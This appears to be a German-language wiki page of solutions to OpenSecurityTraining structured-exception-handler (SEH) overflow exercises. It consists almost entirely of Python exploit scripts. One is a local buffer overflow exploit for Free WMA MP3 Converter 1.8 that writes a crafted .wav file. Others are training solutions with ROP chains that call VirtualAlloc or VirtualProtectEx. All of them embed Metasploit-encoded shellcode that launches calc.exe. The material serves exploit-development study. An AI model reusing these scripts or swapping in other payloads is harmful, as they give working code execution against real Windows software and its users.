[Open Security Training Challanges (SEH)]


[Exploit for WMA MP3 1.8 Converter]

   1 !/usr/bin/env python
   2 # Exploit Title: Free WMA MP3 1.8 Converter (.wav) - Local Buffer Overflow Exploit (SEH)
   3 # Date: 20/11/2014
   4 # Author: headshoot
   5 # Contact: deadbea7@fake.mx
   6 # Software: 
   7 # Tested on WinXP SP3
   8 
   9 import struct
  10 
  11 thestring = "\x90" * (104+44)
  12 # ===============================================================
  13 # $ sudo msfpayload windows/exec CMD=calc.exe R|msfencode  -e x86/nonalpha -t py  
  14 # [*] x86/nonalpha succeeded with size 287 (iteration=1)
  15 # ===============================================================
  16 thestring += (
  17 "\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x33\x8b"
  18 "\xd7\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28"
  19 "\x07\xeb\xf1\xeb\x38\xe8\xe2\xff\xff\xff\x17\x29\x29"
  20 "\x29\x09\x31\x1a\x29\x24\x29\x39\x03\x07\x31\x2b\x33"
  21 "\x23\x32\x06\x06\x23\x23\x15\x30\x23\x37\x1a\x22\x21"
  22 "\x2a\x23\x21\x11\x2b\x13\x0c\x25\x13\x06\x34\x09\x0c"
  23 "\x11\x28\x18\x1a\x0f\x18\x16\x03\x16\xfc\xe8\x89\x00"
  24 "\x00\x00\x60\x89\xe5\x31\xd2\x7b\x8b\x7b\x30\x8b\x7b"
  25 "\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7\x7b\x26\x31\xff"
  26 "\x31\xc0\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
  27 "\xc7\xe2\xf0\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x01\xd0"
  28 "\x8b\x40\x7b\x85\xc0\x7b\x7b\x01\xd0\x7b\x8b\x7b\x18"
  29 "\x8b\x7b\x20\x01\xd3\xe3\x3c\x7b\x8b\x34\x8b\x01\xd6"
  30 "\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x7b"
  31 "\xf4\x03\x7d\xf8\x3b\x7d\x24\x7b\xe2\x7b\x8b\x7b\x24"
  32 "\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c\x01\xd3\x8b\x04"
  33 "\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b\x7b\x7b\x7b"
  34 "\xff\xe0\x7b\x5f\x7b\x8b\x12\xeb\x86\x5d\x7b\x01\x8d"
  35 "\x85\xb9\x00\x00\x00\x7b\x7b\x31\x8b\x7b\x87\xff\xd5"
  36 "\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd\x9d\xff\xd5\x3c"
  37 "\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b\x13\x7b\x7b"
  38 "\x7b\x00\x7b\xff\xd5\x7b\x7b\x7b\x7b\x2e\x7b\x7b\x7b"
  39 "\x00") 
  40 thestring += "\xCC" * (4116-435) #(4116-144)
  41 thestring += "\xeb\x06\x90\x90" # next SE override 
  42 thestring += struct.pack("<L", 0x00401474) # SE Handler override
  43 thestring += "\x90"*4
  44 thestring += "\x81\xC4\x70\x04\x00\x00" # ADD ESP, 400
  45 thestring += "\xFF\xE4\x90\x90"
  46 thestring += "\xCC" * (5000-len(thestring)) # make exploit more relilable
  47 
  48 if __name__ == '__main__':
  49 
  50         fileName='C:\exploit_apps\Free WMA MP3 Converter\\freewma_poc.wav'
  51 
  52         with open(fileName, 'wb') as fb:
  53                 fb.write(bytearray(thestring))
  54         fb.close()

[Different Solutions for SEH_HARDENED and SEH_SIMPLE]

These are different solutions to the Trainings from openSecuritytraining.info

[SEH hardened call to Valloc]

   1 ##!/usr/bin/python
   2 # -*- coding: cp1252 -*-
   3 # Author:: Dirk
   4 # Datum: 10.11.2014
   5 # Funktion: Exploit for seh_overflow_hardened
   6 # Application: seh_harded from http://opensecuritytraining.info/Exploits2.html
   7 # ============================= Mona setup for badchars =====================
   8 # !mona compare -f C:\logs\seh_overflow\bytearray.bin -a 0012fbd0
   9 # !mona bytearray -n -cpb '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10'
  10 import struct
  11 
  12 
  13 
  14 mystring = b"\x90"*100                          # Padding
  15 # ======================================================================
  16 # windows/exec
  17 # CMD=calc.exe
  18 # msfpayload windows/exec CMD=calc.exe R| \
  19 # =========================== Stripped badchars payload ================
  20 # msfencode -e x86/nonalpha -b \
  21 # '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10' -t py 
  22 # [*] x86/nonalpha succeeded with size 287 (iteration=1)
  23 # ======================================================================
  24 mystring+=("\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x33\x8b"
  25 "\xd7\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28"
  26 "\x07\xeb\xf1\xeb\x38\xe8\xe2\xff\xff\xff\x17\x29\x29"
  27 "\x29\x09\x31\x1a\x29\x24\x29\x39\x03\x07\x31\x2b\x33"
  28 "\x23\x32\x06\x06\x23\x23\x15\x30\x23\x37\x1a\x22\x21"
  29 "\x2a\x23\x21\x11\x2b\x13\x0c\x25\x13\x06\x34\x09\x0c"
  30 "\x11\x28\x18\x1a\x0f\x18\x16\x03\x16\xfc\xe8\x89\x00"
  31 "\x00\x00\x60\x89\xe5\x31\xd2\x7b\x8b\x7b\x30\x8b\x7b"
  32 "\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7\x7b\x26\x31\xff"
  33 "\x31\xc0\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
  34 "\xc7\xe2\xf0\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x01\xd0"
  35 "\x8b\x40\x7b\x85\xc0\x7b\x7b\x01\xd0\x7b\x8b\x7b\x18"
  36 "\x8b\x7b\x20\x01\xd3\xe3\x3c\x7b\x8b\x34\x8b\x01\xd6"
  37 "\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x7b"
  38 "\xf4\x03\x7d\xf8\x3b\x7d\x24\x7b\xe2\x7b\x8b\x7b\x24"
  39 "\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c\x01\xd3\x8b\x04"
  40 "\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b\x7b\x7b\x7b"
  41 "\xff\xe0\x7b\x5f\x7b\x8b\x12\xeb\x86\x5d\x7b\x01\x8d"
  42 "\x85\xb9\x00\x00\x00\x7b\x7b\x31\x8b\x7b\x87\xff\xd5"
  43 "\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd\x9d\xff\xd5\x3c"
  44 "\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b\x13\x7b\x7b"
  45 "\x7b\x00\x7b\xff\xd5\x7b\x7b\x7b\x7b\x2e\x7b\x7b\x7b"
  46 "\x00")
  47 
  48 ###################### [ ROP Chain ] ####
  49 mystring+=b"\x90"* (645-60)                             # Garbage
  50 mystring+=struct.pack("<L", 0x7c809AE1) # Location after stack pivot (call to VirutalAlloc)
  51 mystring+=struct.pack("<L", 0x0013fbd0) # Return address from VProtectEx # 0012fbd0
  52 mystring+=struct.pack("<L", 0x0013fbd0) # Baseaddress of the Shellcode (lpAddress)
  53 mystring+=struct.pack("<L", 0x00000001) # dwSize
  54 mystring+=struct.pack("<L", 0x00001000) # DWORD flAllocationType MEM_COMMIT 0x00001000
  55 mystring+=struct.pack("<L", 0x00000040) # flProtect
  56 ################## [ Stackpivot start ] #
  57 mystring+=b"\xCC"*96                                    # compensate
  58 mystring+="\x90"*4                                              # Next SEH
  59 mystring+= struct.pack("<L", 0x10086d6a ) # SE Handler "add esp, 0x878, ret"
  60 mystring+=b"\xCC"*(1200-len(mystring))
  61 fileName='C:\seh_overflow.bin'

[SEH exploit with vprotect]

   1 #!/usr/bin/python
   2 # -*- coding: cp1252 -*-
   3 # !mona compare -f C:\logs\seh_overflow\bytearray.bin -a 0012fbd0
   4 # !mona bytearray -n -cpb '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10'
   5 
   6 
   7 import struct
   8 mystring = b"\x90"*100 # Padding
   9 
  10 # ======================================================================
  11 # windows/exec
  12 # CMD=calc.exe
  13 # msfpayload windows/exec CMD=calc.exe R|msfencode -e x86/nonalpha -b '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10' -t py 
  14 # [*] x86/nonalpha succeeded with size 287 (iteration=1)
  15 # ======================================================================
  16 mystring+=("\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x33\x8b"
  17 "\xd7\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28"
  18 "\x07\xeb\xf1\xeb\x38\xe8\xe2\xff\xff\xff\x17\x29\x29"
  19 "\x29\x09\x31\x1a\x29\x24\x29\x39\x03\x07\x31\x2b\x33"
  20 "\x23\x32\x06\x06\x23\x23\x15\x30\x23\x37\x1a\x22\x21"
  21 "\x2a\x23\x21\x11\x2b\x13\x0c\x25\x13\x06\x34\x09\x0c"
  22 "\x11\x28\x18\x1a\x0f\x18\x16\x03\x16\xfc\xe8\x89\x00"
  23 "\x00\x00\x60\x89\xe5\x31\xd2\x7b\x8b\x7b\x30\x8b\x7b"
  24 "\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7\x7b\x26\x31\xff"
  25 "\x31\xc0\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
  26 "\xc7\xe2\xf0\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x01\xd0"
  27 "\x8b\x40\x7b\x85\xc0\x7b\x7b\x01\xd0\x7b\x8b\x7b\x18"
  28 "\x8b\x7b\x20\x01\xd3\xe3\x3c\x7b\x8b\x34\x8b\x01\xd6"
  29 "\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x7b"
  30 "\xf4\x03\x7d\xf8\x3b\x7d\x24\x7b\xe2\x7b\x8b\x7b\x24"
  31 "\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c\x01\xd3\x8b\x04"
  32 "\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b\x7b\x7b\x7b"
  33 "\xff\xe0\x7b\x5f\x7b\x8b\x12\xeb\x86\x5d\x7b\x01\x8d"
  34 "\x85\xb9\x00\x00\x00\x7b\x7b\x31\x8b\x7b\x87\xff\xd5"
  35 "\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd\x9d\xff\xd5\x3c"
  36 "\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b\x13\x7b\x7b"
  37 "\x7b\x00\x7b\xff\xd5\x7b\x7b\x7b\x7b\x2e\x7b\x7b\x7b"
  38 "\x00")
  39 
  40 ################## [ ROP Start ] ###### #
  41 mystring+=b"\x90"* (645-60)             # Garbage
  42 #mystring+=struct.pack("<L", 0x10051281)
  43 # 0x10097784 :  # PUSH ESP # POP ESI # POP ECX # RETN    ** [Flash6.ocx] **   | Gadget to safe esp
  44 mystring+=struct.pack("<L", 0x7c801ad4) # Location after stack pivot (call to VirutalProtectEx)
  45 mystring+=struct.pack("<L", 0x0013fbd0) # Return address from VProtectEx # 0012fbd0
  46 mystring+=struct.pack("<L", 0x0013fbd0) # Baseaddress of the Shellcode (lpAddress)
  47 mystring+=struct.pack("<L", 0x00000122) # (Size - Shellcode length) (dwSize)
  48 mystring+=struct.pack("<L", 0x00000040) # Specifies the new protection Mode == 
  49 mystring+=struct.pack("<L", 0x0013fb80) # Pointer to a writeable address (lpOldProtect) 0x1003c898
  50 ################## [ Stackpivot start ] #
  51 mystring+=b"\xCC"*96                                    # compensate
  52 mystring+="\x90"*4                                              # Next SEH
  53 mystring+= struct.pack("<L", 0x10086d6a ) # SE Handler "add esp, 0x878, ret"
  54 mystring+=b"\xCC"*(1200-len(mystring))
  55 
  56 fileName='C:\seh_overflow.bin'
  57 
  58 with open(fileName, 'wb') as fb:
  59     fb.write(bytearray(mystring))
  60 fb.close()


[SEH exploit with call to WIP]

   1 #!/usr/bin/python
   2 # -*- coding: cp1252 -*-
   3 # !mona compare -f C:\logs\seh_overflow\bytearray.bin -a 0012fbd0
   4 # !mona bytearray -n -cpb '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10'
   5 
   6 
   7 import struct
   8 mystring = b"\x90"*100 # Padding
   9 
  10 # ======================================================================
  11 # windows/exec
  12 # CMD=calc.exe
  13 # msfpayload windows/exec CMD=calc.exe R|msfencode -e x86/nonalpha -b '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10' -t py 
  14 # [*] x86/nonalpha succeeded with size 287 (iteration=1)
  15 # ======================================================================
  16 mystring+=("\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x33\x8b"
  17 "\xd7\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28"
  18 "\x07\xeb\xf1\xeb\x38\xe8\xe2\xff\xff\xff\x17\x29\x29"
  19 "\x29\x09\x31\x1a\x29\x24\x29\x39\x03\x07\x31\x2b\x33"
  20 "\x23\x32\x06\x06\x23\x23\x15\x30\x23\x37\x1a\x22\x21"
  21 "\x2a\x23\x21\x11\x2b\x13\x0c\x25\x13\x06\x34\x09\x0c"
  22 "\x11\x28\x18\x1a\x0f\x18\x16\x03\x16\xfc\xe8\x89\x00"
  23 "\x00\x00\x60\x89\xe5\x31\xd2\x7b\x8b\x7b\x30\x8b\x7b"
  24 "\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7\x7b\x26\x31\xff"
  25 "\x31\xc0\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
  26 "\xc7\xe2\xf0\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x01\xd0"
  27 "\x8b\x40\x7b\x85\xc0\x7b\x7b\x01\xd0\x7b\x8b\x7b\x18"
  28 "\x8b\x7b\x20\x01\xd3\xe3\x3c\x7b\x8b\x34\x8b\x01\xd6"
  29 "\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x7b"
  30 "\xf4\x03\x7d\xf8\x3b\x7d\x24\x7b\xe2\x7b\x8b\x7b\x24"
  31 "\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c\x01\xd3\x8b\x04"
  32 "\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b\x7b\x7b\x7b"
  33 "\xff\xe0\x7b\x5f\x7b\x8b\x12\xeb\x86\x5d\x7b\x01\x8d"
  34 "\x85\xb9\x00\x00\x00\x7b\x7b\x31\x8b\x7b\x87\xff\xd5"
  35 "\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd\x9d\xff\xd5\x3c"
  36 "\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b\x13\x7b\x7b"
  37 "\x7b\x00\x7b\xff\xd5\x7b\x7b\x7b\x7b\x2e\x7b\x7b\x7b"
  38 "\x00")
  39 
  40 ################## [ ROP Start ] ###### #
  41 mystring+=b"\x90"* 585                                  # Garbage
  42 mystring+=struct.pack("<L", 0x1008e997) # ADD ESP,20 # RETN
  43 mystring+=struct.pack("<L", 0x7c801ad4) # Location after stack pivot (call to VirutalProtectEx)
  44 mystring+="AAAA"
  45 mystring+="XXXX"
  46 mystring+="YYYY"
  47 #mystring+="ZZZZ"
  48 #mystring+=struct.pack("<L", 0x0013fbd0) # Return address from VProtectEx # 0012fbd0
  49 #mystring+=struct.pack("<L", 0x0013fbd0) # Baseaddress of the Shellcode (lpAddress)
  50 #mystring+=struct.pack("<L", 0x00000122)        # (Size - Shellcode length) (dwSize)
  51 #mystring+=struct.pack("<L", 0x00000040) # Specifies the new protection Mode == 
  52 #mystring+=struct.pack("<L", 0x0013fb80)        # Pointer to a writeable address (lpOldProtect) 0x1003c898
  53 ################## [ Stackpivot start ] #
  54 mystring+=b"\xCC"*(100)                                 # compensate
  55 mystring+="\x90"*4                                              # Next SEH
  56 mystring+= struct.pack("<L", 0x10086d6a ) # SE Handler "add esp, 0x878, ret"
  57 mystring+=b"\xCC"*(1200-len(mystring))
  58 
  59 fileName='C:\seh_overflow.bin'


[Simple SEH overflow]

   1 #!/usr/bin/python
   2 
   3 import struct
   4 
   5 mystring=b"\xCC"*100
   6 # ======================================================================
   7 # windows/exec - 200 bytes
   8 # http://www.metasploit.com
   9 # VERBOSE=false, PrependMigrate=false, EXITFUNC=seh, 
  10 # CMD=calc.exe
  11 # [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)
  12 # ======================================================================
  13 mystring +=("\xdb\xcd\xd9\x74\x24\xf4\xbd\xa1\x17\xfb\x07\x58\x29"
  14 "\xc9\xb1\x33\x83\xc0\x04\x31\x68\x13\x03\xc9\x04\x19"
  15 "\xf2\xf5\xc3\x54\xfd\x05\x14\x07\x77\xe0\x25\x15\xe3"
  16 "\x61\x17\xa9\x67\x27\x94\x42\x25\xd3\x2f\x26\xe2\xd4"
  17 "\x98\x8d\xd4\xdb\x19\x20\xd9\xb7\xda\x22\xa5\xc5\x0e"
  18 "\x85\x94\x06\x43\xc4\xd1\x7a\xac\x94\x8a\xf1\x1f\x09"
  19 "\xbe\x47\x9c\x28\x10\xcc\x9c\x52\x15\x12\x68\xe9\x14"
  20 "\x42\xc1\x66\x5e\x7a\x69\x20\x7f\x7b\xbe\x32\x43\x32"
  21 "\xcb\x81\x37\xc5\x1d\xd8\xb8\xf4\x61\xb7\x86\x39\x6c"
  22 "\xc9\xcf\xfd\x8f\xbc\x3b\xfe\x32\xc7\xff\x7d\xe9\x42"
  23 "\xe2\x25\x7a\xf4\xc6\xd4\xaf\x63\x8c\xda\x04\xe7\xca"
  24 "\xfe\x9b\x24\x61\xfa\x10\xcb\xa6\x8b\x63\xe8\x62\xd0"
  25 "\x30\x91\x33\xbc\x97\xae\x24\x18\x47\x0b\x2e\x8a\x9c"
  26 "\x2d\x6d\xc0\x63\xbf\x0b\xad\x64\xbf\x13\x9d\x0c\x8e"
  27 "\x98\x72\x4a\x0f\x4b\x37\xaa\xfe\x46\xad\x3b\x59\x33"
  28 "\x8c\x21\x5a\xe9\xd2\x5f\xd9\x18\xaa\x9b\xc1\x68\xaf"
  29 "\xe0\x45\x80\xdd\x79\x20\xa6\x72\x79\x61\xc5\x15\xe9"
  30 "\xe9\x24\xb0\x89\x88\x38")
  31 mystring+=b"\xCC"* (765)#+327)
  32 mystring+=b"\xeb\x06\x90\x90" # next SE Handler 
  33 mystring+= struct.pack("<L", 0x00401106) # SE Handler
  34 mystring+=b"\x90"*4
  35 mystring+= "\xB9\xD0\xFB\x12\x00" #== mov ecx, 0x401000 address of prize
  36 mystring+= "\xFF\xE1\x90\x90"
  37 mystring+=b"\xCC"*16
  38 #mystring+=b"\x90"*(1500-len(mystring))
  39 
  40 fileName='C:\seh_overflow.bin'
  41 
  42 with open(fileName, 'wb') as fb:
  43     fb.write(bytearray(mystring))
  44 fb.close()


exploitation

seh_exploitation/os_training (zuletzt geändert am 2016-12-12 17:27:02 durch Dirk)